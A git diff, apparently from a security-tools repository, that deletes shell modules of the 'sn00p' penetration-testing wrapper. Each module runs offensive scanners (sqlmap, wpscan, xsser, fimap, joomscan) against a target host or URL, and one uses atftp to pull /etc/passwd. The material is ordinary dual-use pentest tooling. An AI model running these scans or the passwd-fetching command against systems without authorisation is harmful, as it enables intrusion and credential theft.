${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# dns -# TOOLS: -do_dns_default() -{ - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/69.sh b/automation/sn00p/source/src/modules/udp/69.sh deleted file mode 100644 index 99ea12f..0000000 --- a/automation/sn00p/source/src/modules/udp/69.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to get passwd via atfp -# TOOLS: atftp -do_atftp_connect() -{ - opts="--verbose -g -r /etc/passwd -l passwd" - - atftp ${opts} ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/default.sh b/automation/sn00p/source/src/modules/udp/default.sh deleted file mode 100644 index 4721f3d..0000000 --- a/automation/sn00p/source/src/modules/udp/default.sh +++ /dev/null @@ -1,167 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# read banner via netcat or at least do a connect -# TOOLS: nc -do_netcat_connect() -{ - echo -e "\n" | nc -vvu -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# read banner via amap -# TOOLS: amap -do_amap() -{ - opts="-bqv -u -c 64 -C 2 -T 3 -t 3" - - amap ${opts} ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# read banner, do rpc scans, fingerprint and run NSE script via nmap -# TOOLS: nmap -do_nmap_banner() -{ - opts="-n -sUCV -sR -PN --version-all" - - nmap ${opts} -p ${DPORT} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# connect via SSL and try to read -# TOOLS: openssl -do_openssl_connect() -{ - echo "" | openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/asp.sh b/automation/sn00p/source/src/modules/web/asp.sh deleted file mode 100644 index 05b4781..0000000 --- a/automation/sn00p/source/src/modules/web/asp.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan for common misconfigurations and info leaks in asp.net apps -# TOOLS: asp-audit -do_asp_audit() -{ - opts="-bf" - - asp-audit ${URL} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/default.sh b/automation/sn00p/source/src/modules/web/default.sh deleted file mode 100644 index 7ce3954..0000000 --- a/automation/sn00p/source/src/modules/web/default.sh +++ /dev/null @@ -1,152 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# map whole webapplication and do quick security scans -# TOOLS: golismero -do_golismero() -{ - opts="-e dns,dns_malware,fingerprint_web,punkspider,robots,spider" - opts="${opts} --full --no-color -q -o -" - - golismero ${opts} scan ${URL} 2>&1 - - return ${SUCCESS} -} - - -# just crawl the webpage and save website data for later usage (uwss modules) -# TOOLS: uwss.sh -do_uwss() -{ - opts="-q -c" - - # we do not need any log results. we are only interested in website data - # results will be saved under /tmp/uwss.dat - uwss.sh ${opts} -u ${URL} > /dev/null 2>&1 - - echo "crawled data with uwss" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/drupal.sh b/automation/sn00p/source/src/modules/web/drupal.sh deleted file mode 100644 index 15a4b07..0000000 --- a/automation/sn00p/source/src/modules/web/drupal.sh +++ /dev/null @@ -1,151 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# fingerprint drupal modules / versions -# TOOLS: DrupalScan -do_drupalscan() -{ - opts="" - - echo "DrupalScan against ${DHOST}" 2>&1 - DrupalScan ${opts} -u ${DHOST} 2>&1 - - echo "DrupalScan against ${URL}" 2>&1 - DrupalScan ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# drupal modules enumerator -# TOOLS: dpscan -do_dpscan() -{ - opts="" - - dpscan ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/finc.sh b/automation/sn00p/source/src/modules/web/finc.sh deleted file mode 100644 index e29d8fa..0000000 --- a/automation/sn00p/source/src/modules/web/finc.sh +++ /dev/null @@ -1,151 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# crawl and scan website for file inclusion bugs with fimap -# TOOLS: fimap -do_fimap() -{ - opts="-H -4 -b -v 1 -d 3" - - fimap ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - -# test for file inclusion bugs with uwss -# TOOLS: uwss -do_uwss_finc() -{ - opts1="-q -m lfi" - opts2="-q -m rfi" - - # local file inclusion - uwss.sh ${opts1} -u ${URL} 2>&1 - - # remote file inclusion - uwss.sh ${opts2} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/fingerprint.sh b/automation/sn00p/source/src/modules/web/fingerprint.sh deleted file mode 100644 index 50ffb90..0000000 --- a/automation/sn00p/source/src/modules/web/fingerprint.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# detect 'web application firewall' lol :) -# TOOLS: wafw00f -do_wafw00f() -{ - opts="-a" - - wafw00f ${opts} ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/fullaudit.sh b/automation/sn00p/source/src/modules/web/fullaudit.sh deleted file mode 100644 index 8ab8bf9..0000000 --- a/automation/sn00p/source/src/modules/web/fullaudit.sh +++ /dev/null @@ -1,177 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# crawl and scan webpage with wapiti -# TOOLS: wapiti -do_wapiti() -{ - opts="--module '-all,xss,crlf,sql,file,htaccess,blindsql,permanentxss' - -t 3 -f txt -o /dev/stdout" - - wapiti.sh ${URL} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# crawl and scan webpage with uniscan -# TOOLS: uniscan -do_uniscan() -{ - opts="-q -w -e -d -s" - - # no need to log uniscan output (uniscan report is enough) - uniscan ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# crawl and scan webpage with skipfish -# TOOLS: skipfish -do_skipfish() -{ - # note: default crawl depth level: 3 - opts="-u -i 5 -t 5 -d 3 -o ${URL}_skipfish" - - # no need to log skipfish output (skipfish report is enough) - skipfish ${opts} ${URL} > ${VERBOSE} 2>&1 - echo "skipfish has created own report, see ${URL}_skipfish/" - - return ${SUCCESS} -} - - -# crawl and scan webpage with arachni -# TOOLS: arachni -do_arachni() -{ - # note: default crawl depth level: 3 - opts="--user-agent=yomama --depth=3 --report=stdout" - - arachni ${opts} ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/joomla.sh b/automation/sn00p/source/src/modules/web/joomla.sh deleted file mode 100644 index 897c997..0000000 --- a/automation/sn00p/source/src/modules/web/joomla.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan for joomla vunerabilities, fingerprint etc. with joomscan -# TOOLS: joomscan -do_joomscan() -{ - opts="-g 'yomama'" - - joomscan ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/ldapi.sh b/automation/sn00p/source/src/modules/web/ldapi.sh deleted file mode 100644 index 46d6580..0000000 --- a/automation/sn00p/source/src/modules/web/ldapi.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan site for ldap injection bugs with uwss -# TOOLS: uwss.sh -do_uwss_ldapi() -{ - opts="-q -m ldap" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/oci.sh b/automation/sn00p/source/src/modules/web/oci.sh deleted file mode 100644 index ff7362c..0000000 --- a/automation/sn00p/source/src/modules/web/oci.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan site for os command injection bugs with uwss -# TOOLS: uwss.sh -do_uwss_oci() -{ - opts="-q -m os" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/rce.sh b/automation/sn00p/source/src/modules/web/rce.sh deleted file mode 100644 index bfdd6a0..0000000 --- a/automation/sn00p/source/src/modules/web/rce.sh +++ /dev/null @@ -1,136 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan site for remote code execution bugs with uwss -# TOOLS: uwss.sh -do_uwss_rce() -{ - # php and perl code execution - opts="-q -m php,perl" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/soapi.sh b/automation/sn00p/source/src/modules/web/soapi.sh deleted file mode 100644 index a464fcc..0000000 --- a/automation/sn00p/source/src/modules/web/soapi.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan site for soap injection bugs with uwss -# TOOLS: uwss.sh -do_uwss_soapi() -{ - opts="-q -m soap" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/sqli.sh b/automation/sn00p/source/src/modules/web/sqli.sh deleted file mode 100644 index 64499c3..0000000 --- a/automation/sn00p/source/src/modules/web/sqli.sh +++ /dev/null @@ -1,148 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# test sql injection for single url with sqlmap (GET only!) -# TOOLS: sqlmap -do_sqlmap() -{ - opts="--user-agent=yomama --timeout=5 --retries=2 --level=2 --risk=3 - --time-sec=3 -f --current-user --current-db --hostname --threads=4" - - sqlmap ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# scan website for sql injection bugs with uwss -# TOOLS: uwss.sh -do_uwss_sqli() -{ - opts="-m sql -q" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/wordpress.sh b/automation/sn00p/source/src/modules/web/wordpress.sh deleted file mode 100644 index d4e8eeb..0000000 --- a/automation/sn00p/source/src/modules/web/wordpress.sh +++ /dev/null @@ -1,149 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# fingerprint wordpress version -# TOOLS: plecost -do_plecost() -{ - opts="-i wp_plugin_list.txt -s 5 -M 10 -t 8 -o /dev/stdout" - - plecost ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan wordpress (enumerate vuln plugins and themes, etc.) -# TOOLS: wpscan -do_wpscan() -{ - opts="-f -t 8 --wp-content-dir wp-content" - - # echo, because wpscan is asking for plugin dir interactively, - # if not found (yes, 'yes' is available, fuck that...) - echo -e "y\r\n" | wpscan.sh ${opts} -u ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/xmli.sh b/automation/sn00p/source/src/modules/web/xmli.sh deleted file mode 100644 index c85acc5..0000000 --- a/automation/sn00p/source/src/modules/web/xmli.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan site for xml/xpath injection bugs with uwss -# TOOLS: uwss.sh -do_uwss_xmli() -{ - opts="-q -m xml" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/web/xss.sh b/automation/sn00p/source/src/modules/web/xss.sh deleted file mode 100644 index eae8544..0000000 --- a/automation/sn00p/source/src/modules/web/xss.sh +++ /dev/null @@ -1,160 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# scan for xss vulnerabilities with uwss -# TOOLS: uwss.sh -do_uwss_xss() -{ - opts="-m xss -q" - - uwss.sh ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# scan for xss vulns with xsss -# TOOLS: xsss -do_xsss() -{ - opts="--forms --depth=9" - - xsss ${opts} ${URL} 2>&1 - - return ${SUCCESS} -} - - -# scan for xss vulns with xsser -# TOOLS: xsser -do_xsser() -{ - opts="--Cw=5 --Onm --Ifr --B64 --Coo --Xsa --Xsr --Dcp --Dom --Ind --Anchor" - opts="${opts} --Phpids --auto --follow-redirects" - - xsser ${opts} -u ${URL} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/wlan/default.sh b/automation/sn00p/source/src/modules/wlan/default.sh deleted file mode 100644 index 1a7c053..0000000 --- a/automation/sn00p/source/src/modules/wlan/default.sh +++ /dev/null @@ -1,261 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo 